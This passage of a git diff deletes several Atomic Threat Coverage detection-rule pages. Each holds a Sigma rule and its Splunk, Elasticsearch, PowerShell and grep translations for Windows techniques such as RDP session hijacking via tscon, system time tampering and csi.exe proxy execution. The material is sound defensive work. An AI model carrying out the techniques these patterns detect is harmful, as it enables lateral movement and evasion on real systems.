-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n            Image = {{_source.Image}}\n      CommandLine = {{_source.CommandLine}}\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(ParentImage.keyword:*\\taskmgr.exe AND (NOT (Image.keyword:(*\\resmon.exe *\\mmc.exe *\\taskmgr.exe))))
-```
-
-
-### splunk
-    
-```
-(ParentImage="*\\taskmgr.exe" NOT ((Image="*\\resmon.exe" OR Image="*\\mmc.exe" OR Image="*\\taskmgr.exe"))) | table Image,CommandLine,ParentCommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" ParentImage="*\\taskmgr.exe"  -(Image IN ["*\\resmon.exe", "*\\mmc.exe", "*\\taskmgr.exe"]))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*.*\taskmgr\.exe)(?=.*(?!.*(?:.*(?=.*(?:.*.*\resmon\.exe|.*.*\mmc\.exe|.*.*\taskmgr\.exe))))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_time_modification.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_time_modification.md
deleted file mode 100644
index 0224295..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_time_modification.md
+++ /dev/null
@@ -1,184 +0,0 @@
-| Title                    | Unauthorized System Time Modification       |
-|:-------------------------|:------------------|
-| **Description**          | Detect scenarios where a potentially unauthorized application or user is modifying the system time. |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1099: Timestomp](https://attack.mitre.org/techniques/T1099)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>HyperV or other virtualization technologies with binary not listed in filter portion of detection</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[Private Cuckoo Sandbox (from many years ago, no longer have hash, NDA as well)](Private Cuckoo Sandbox (from many years ago, no longer have hash, NDA as well))</li><li>[Live environment caused by malware](Live environment caused by malware)</li></ul>  |
-| **Author**               | @neu5ron |
-| Other Tags           | <ul><li>attack.t1551.006</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Unauthorized System Time Modification
-id: faa031b5-21ed-4e02-8881-2591f98d82ed
-status: experimental
-description: Detect scenarios where a potentially unauthorized application or user is modifying the system time.
-author: '@neu5ron'
-references:
-    - Private Cuckoo Sandbox (from many years ago, no longer have hash, NDA as well)
-    - Live environment caused by malware
-date: 2019/02/05
-midified: 2020/01/27
-tags:
-    - attack.defense_evasion
-    - attack.t1099
-    - attack.t1551.006
-logsource:
-    product: windows
-    service: security
-    definition: 'Requirements: Audit Policy : System > Audit Security State Change, Group Policy : Computer Configuration\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\System\Audit Security State Change'
-detection:
-    selection:
-        EventID: 4616
-    filter1:
-        ProcessName: 'C:\Program Files\VMware\VMware Tools\vmtoolsd.exe'
-    filter2:
-        ProcessName: 'C:\Windows\System32\VBoxService.exe'
-    filter3:
-        ProcessName: 'C:\Windows\System32\svchost.exe'
-        SubjectUserSid: 'S-1-5-19'
-    condition: selection and not ( filter1 or filter2 or filter3 )
-falsepositives:
-    - HyperV or other virtualization technologies with binary not listed in filter portion of detection
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Security | where {($_.ID -eq "4616" -and  -not (((($_.message -match "ProcessName.*C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe" -or $_.message -match "ProcessName.*C:\\Windows\\System32\\VBoxService.exe") -or ($_.message -match "ProcessName.*C:\\Windows\\System32\\svchost.exe" -and $_.message -match "SubjectUserSid.*S-1-5-19"))))) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Security" AND winlog.event_id:"4616" AND (NOT ((winlog.channel:"Security" AND ((winlog.event_data.ProcessName:"C\:\\Program\ Files\\VMware\\VMware\ Tools\\vmtoolsd.exe" OR winlog.event_data.ProcessName:"C\:\\Windows\\System32\\VBoxService.exe") OR (winlog.event_data.ProcessName:"C\:\\Windows\\System32\\svchost.exe" AND winlog.event_data.SubjectUserSid:"S\-1\-5\-19"))))))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/faa031b5-21ed-4e02-8881-2591f98d82ed <<EOF
-{
-  "metadata": {
-    "title": "Unauthorized System Time Modification",
-    "description": "Detect scenarios where a potentially unauthorized application or user is modifying the system time.",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.t1099",
-      "attack.t1551.006"
-    ],
-    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4616\" AND (NOT ((winlog.channel:\"Security\" AND ((winlog.event_data.ProcessName:\"C\\:\\\\Program\\ Files\\\\VMware\\\\VMware\\ Tools\\\\vmtoolsd.exe\" OR winlog.event_data.ProcessName:\"C\\:\\\\Windows\\\\System32\\\\VBoxService.exe\") OR (winlog.event_data.ProcessName:\"C\\:\\\\Windows\\\\System32\\\\svchost.exe\" AND winlog.event_data.SubjectUserSid:\"S\\-1\\-5\\-19\"))))))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4616\" AND (NOT ((winlog.channel:\"Security\" AND ((winlog.event_data.ProcessName:\"C\\:\\\\Program\\ Files\\\\VMware\\\\VMware\\ Tools\\\\vmtoolsd.exe\" OR winlog.event_data.ProcessName:\"C\\:\\\\Windows\\\\System32\\\\VBoxService.exe\") OR (winlog.event_data.ProcessName:\"C\\:\\\\Windows\\\\System32\\\\svchost.exe\" AND winlog.event_data.SubjectUserSid:\"S\\-1\\-5\\-19\"))))))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Unauthorized System Time Modification'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:"4616" AND (NOT (((ProcessName:"C\:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe" OR ProcessName:"C\:\\Windows\\System32\\VBoxService.exe") OR (ProcessName:"C\:\\Windows\\System32\\svchost.exe" AND SubjectUserSid:"S\-1\-5\-19")))))
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Security" EventCode="4616" NOT ((source="WinEventLog:Security" ((ProcessName="C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe" OR ProcessName="C:\\Windows\\System32\\VBoxService.exe") OR (ProcessName="C:\\Windows\\System32\\svchost.exe" SubjectUserSid="S-1-5-19")))))
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" event_id="4616"  -((event_source="Microsoft-Windows-Security-Auditing" ((ProcessName="C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe" OR ProcessName="C:\\Windows\\System32\\VBoxService.exe") OR (ProcessName="C:\\Windows\\System32\\svchost.exe" SubjectUserSid="S-1-5-19")))))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*4616)(?=.*(?!.*(?:.*(?:.*(?:.*(?:.*(?:.*C:\Program Files\VMware\VMware Tools\vmtoolsd\.exe|.*C:\Windows\System32\VBoxService\.exe))|.*(?:.*(?=.*C:\Windows\System32\svchost\.exe)(?=.*S-1-5-19))))))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_tscon_localsystem.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_tscon_localsystem.md
deleted file mode 100644
index 2e595bb..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_tscon_localsystem.md
+++ /dev/null
@@ -1,174 +0,0 @@
-| Title                    | Suspicious TSCON Start       |
-|:-------------------------|:------------------|
-| **Description**          | Detects a tscon.exe start as LOCAL SYSTEM |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0011: Command and Control](https://attack.mitre.org/tactics/TA0011)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1219: Remote Access Software](https://attack.mitre.org/techniques/T1219)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1219: Remote Access Software](../Triggers/T1219.md)</li></ul>  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html](http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html)</li><li>[https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6](https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6)</li></ul>  |
-| **Author**               | Florian Roth |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Suspicious TSCON Start
-id: 9847f263-4a81-424f-970c-875dab15b79b
-status: experimental
-description: Detects a tscon.exe start as LOCAL SYSTEM
-references:
-    - http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html
-    - https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6
-author: Florian Roth
-date: 2018/03/17
-tags:
-    - attack.command_and_control
-    - attack.t1219
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        User: NT AUTHORITY\SYSTEM
-        Image: '*\tscon.exe'
-    condition: selection
-falsepositives:
-    - Unknown
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "User.*NT AUTHORITY\\SYSTEM" -and $_.message -match "Image.*.*\\tscon.exe") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.User:"NT\ AUTHORITY\\SYSTEM" AND winlog.event_data.Image.keyword:*\\tscon.exe)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/9847f263-4a81-424f-970c-875dab15b79b <<EOF
-{
-  "metadata": {
-    "title": "Suspicious TSCON Start",
-    "description": "Detects a tscon.exe start as LOCAL SYSTEM",
-    "tags": [
-      "attack.command_and_control",
-      "attack.t1219"
-    ],
-    "query": "(winlog.event_data.User:\"NT\\ AUTHORITY\\\\SYSTEM\" AND winlog.event_data.Image.keyword:*\\\\tscon.exe)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.User:\"NT\\ AUTHORITY\\\\SYSTEM\" AND winlog.event_data.Image.keyword:*\\\\tscon.exe)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Suspicious TSCON Start'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(User:"NT AUTHORITY\\SYSTEM" AND Image.keyword:*\\tscon.exe)
-```
-
-
-### splunk
-    
-```
-(User="NT AUTHORITY\\SYSTEM" Image="*\\tscon.exe")
-```
-
-
-### logpoint
-    
-```
-(event_id="1" User="NT AUTHORITY\\SYSTEM" Image="*\\tscon.exe")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*NT AUTHORITY\SYSTEM)(?=.*.*\tscon\.exe))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_tscon_rdp_redirect.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_tscon_rdp_redirect.md
deleted file mode 100644
index 6e4af10..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_tscon_rdp_redirect.md
+++ /dev/null
@@ -1,180 +0,0 @@
-| Title                    | Suspicious RDP Redirect Using TSCON       |
-|:-------------------------|:------------------|
-| **Description**          | Detects a suspicious RDP session redirect using tscon.exe |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0008: Lateral Movement](https://attack.mitre.org/tactics/TA0008)</li><li>[TA0004: Privilege Escalation](https://attack.mitre.org/tactics/TA0004)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1076: Remote Desktop Protocol](https://attack.mitre.org/techniques/T1076)</li><li>[T1021: Remote Services](https://attack.mitre.org/techniques/T1021)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html](http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html)</li><li>[https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6](https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6)</li></ul>  |
-| **Author**               | Florian Roth |
-| Other Tags           | <ul><li>car.2013-07-002</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Suspicious RDP Redirect Using TSCON
-id: f72aa3e8-49f9-4c7d-bd74-f8ab84ff9bbb
-status: experimental
-description: Detects a suspicious RDP session redirect using tscon.exe
-references:
-    - http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html
-    - https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6
-tags:
-    - attack.lateral_movement
-    - attack.privilege_escalation
-    - attack.t1076
-    - car.2013-07-002
-    - attack.t1021
-author: Florian Roth
-date: 2018/03/17
-modified: 2018/12/11
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        CommandLine: '* /dest:rdp-tcp:*'
-    condition: selection
-falsepositives:
-    - Unknown
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "CommandLine.*.* /dest:rdp-tcp:.*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-winlog.event_data.CommandLine.keyword:*\ \/dest\:rdp\-tcp\:*
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/f72aa3e8-49f9-4c7d-bd74-f8ab84ff9bbb <<EOF
-{
-  "metadata": {
-    "title": "Suspicious RDP Redirect Using TSCON",
-    "description": "Detects a suspicious RDP session redirect using tscon.exe",
-    "tags": [
-      "attack.lateral_movement",
-      "attack.privilege_escalation",
-      "attack.t1076",
-      "car.2013-07-002",
-      "attack.t1021"
-    ],
-    "query": "winlog.event_data.CommandLine.keyword:*\\ \\/dest\\:rdp\\-tcp\\:*"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.CommandLine.keyword:*\\ \\/dest\\:rdp\\-tcp\\:*",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Suspicious RDP Redirect Using TSCON'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-CommandLine.keyword:* \/dest\:rdp\-tcp\:*
-```
-
-
-### splunk
-    
-```
-CommandLine="* /dest:rdp-tcp:*"
-```
-
-
-### logpoint
-    
-```
-(event_id="1" CommandLine="* /dest:rdp-tcp:*")
-```
-
-
-### grep
-    
-```
-grep -P '^.* /dest:rdp-tcp:.*'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_use_of_csharp_console.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_use_of_csharp_console.md
deleted file mode 100644
index 1786247..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_use_of_csharp_console.md
+++ /dev/null
@@ -1,174 +0,0 @@
-| Title                    | Suspicious Use of CSharp Interactive Console       |
-|:-------------------------|:------------------|
-| **Description**          | Detects the execution of CSharp interactive console by PowerShell |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1127: Trusted Developer Utilities Proxy Execution](https://attack.mitre.org/techniques/T1127)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Possible depending on environment. Pair with other factors such as net connections, command-line args, etc.</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://redcanary.com/blog/detecting-attacks-leveraging-the-net-framework/](https://redcanary.com/blog/detecting-attacks-leveraging-the-net-framework/)</li></ul>  |
-| **Author**               | Michael R. (@nahamike01) |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Suspicious Use of CSharp Interactive Console
-id: a9e416a8-e613-4f8b-88b8-a7d1d1af2f61
-status: experimental
-description: Detects the execution of CSharp interactive console by PowerShell
-references:
-    - https://redcanary.com/blog/detecting-attacks-leveraging-the-net-framework/
-author: Michael R. (@nahamike01)
-date: 2020/03/08
-tags:
-    - attack.execution
-    - attack.t1127
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        Image|endswith: '\csi.exe'
-        ParentImage|endswith: '\powershell.exe'
-        OriginalFileName: 'csi.exe'
-    condition: selection
-falsepositives:
-    - Possible depending on environment. Pair with other factors such as net connections, command-line args, etc.
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "Image.*.*\\csi.exe" -and $_.message -match "ParentImage.*.*\\powershell.exe" -and $_.message -match "OriginalFileName.*csi.exe") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.Image.keyword:*\\csi.exe AND winlog.event_data.ParentImage.keyword:*\\powershell.exe AND OriginalFileName:"csi.exe")
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/a9e416a8-e613-4f8b-88b8-a7d1d1af2f61 <<EOF
-{
-  "metadata": {
-    "title": "Suspicious Use of CSharp Interactive Console",
-    "description": "Detects the execution of CSharp interactive console by PowerShell",
-    "tags": [
-      "attack.execution",
-      "attack.t1127"
-    ],
-    "query": "(winlog.event_data.Image.keyword:*\\\\csi.exe AND winlog.event_data.ParentImage.keyword:*\\\\powershell.exe AND OriginalFileName:\"csi.exe\")"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.Image.keyword:*\\\\csi.exe AND winlog.event_data.ParentImage.keyword:*\\\\powershell.exe AND OriginalFileName:\"csi.exe\")",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Suspicious Use of CSharp Interactive Console'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(Image.keyword:*\\csi.exe AND ParentImage.keyword:*\\powershell.exe AND OriginalFileName:"csi.exe")
-```
-
-
-### splunk
-    
-```
-(Image="*\\csi.exe" ParentImage="*\\powershell.exe" OriginalFileName="csi.exe")
-```
-
-
-### logpoint
-    
-```
-(event_id="1" Image="*\\csi.exe" ParentImage="*\\powershell.exe" OriginalFileName="csi.exe")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*.*\csi\.exe)(?=.*.*\powershell\.exe)(?=.*csi\.exe))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_userinit_child.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_userinit_child.md
deleted file mode 100644
index 903ec0d..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_userinit_child.md
+++ /dev/null
@@ -1,173 +0,0 @@
-| Title                    | Suspicious Userinit Child Process       |
-|:-------------------------|:------------------|
-| **Description**          | Detects a suspicious child process of userinit |
-| **ATT&amp;CK Tactic**    |   This Detection Rule wasn't mapped to ATT&amp;CK Tactic yet  |
-| **ATT&amp;CK Technique** |  This Detection Rule wasn't mapped to ATT&amp;CK Technique yet  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>Administrative scripts</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://twitter.com/SBousseaden/status/1139811587760562176](https://twitter.com/SBousseaden/status/1139811587760562176)</li></ul>  |
-| **Author**               | Florian Roth (rule), Samir Bousseaden (idea) |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Suspicious Userinit Child Process
-id: b655a06a-31c0-477a-95c2-3726b83d649d
-status: experimental
-description: Detects a suspicious child process of userinit
-references:
-    - https://twitter.com/SBousseaden/status/1139811587760562176
-author: Florian Roth (rule), Samir Bousseaden (idea)
-date: 2019/06/17
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        ParentImage: '*\userinit.exe'
-    filter1:
-        CommandLine: '*\\netlogon\\*'
-    filter2:
-        Image: '*\explorer.exe'
-    condition: selection and not filter1 and not filter2
-fields:
-    - CommandLine
-    - ParentCommandLine
-falsepositives:
-    - Administrative scripts
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "ParentImage.*.*\\userinit.exe" -and  -not ($_.message -match "CommandLine.*.*\\netlogon\\.*")) -and  -not ($_.message -match "Image.*.*\\explorer.exe")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-((winlog.event_data.ParentImage.keyword:*\\userinit.exe AND (NOT (winlog.event_data.CommandLine.keyword:*\\netlogon\\*))) AND (NOT (winlog.event_data.Image.keyword:*\\explorer.exe)))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/b655a06a-31c0-477a-95c2-3726b83d649d <<EOF
-{
-  "metadata": {
-    "title": "Suspicious Userinit Child Process",
-    "description": "Detects a suspicious child process of userinit",
-    "tags": "",
-    "query": "((winlog.event_data.ParentImage.keyword:*\\\\userinit.exe AND (NOT (winlog.event_data.CommandLine.keyword:*\\\\netlogon\\\\*))) AND (NOT (winlog.event_data.Image.keyword:*\\\\explorer.exe)))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "((winlog.event_data.ParentImage.keyword:*\\\\userinit.exe AND (NOT (winlog.event_data.CommandLine.keyword:*\\\\netlogon\\\\*))) AND (NOT (winlog.event_data.Image.keyword:*\\\\explorer.exe)))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Suspicious Userinit Child Process'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n      CommandLine = {{_source.CommandLine}}\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-((ParentImage.keyword:*\\userinit.exe AND (NOT (CommandLine.keyword:*\\netlogon\\*))) AND (NOT (Image.keyword:*\\explorer.exe)))
-```
-
-
-### splunk
-    
-```
-((ParentImage="*\\userinit.exe" NOT (CommandLine="*\\netlogon\\*")) NOT (Image="*\\explorer.exe")) | table CommandLine,ParentCommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" (ParentImage="*\\userinit.exe"  -(CommandLine="*\\netlogon\\*"))  -(Image="*\\explorer.exe"))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*(?=.*.*\userinit\.exe)(?=.*(?!.*(?:.*(?=.*.*\\netlogon\\.*))))))(?=.*(?!.*(?:.*(?=.*.*\explorer\.exe)))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_whoami.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_whoami.md
deleted file mode 100644
index 619a91f..0000000
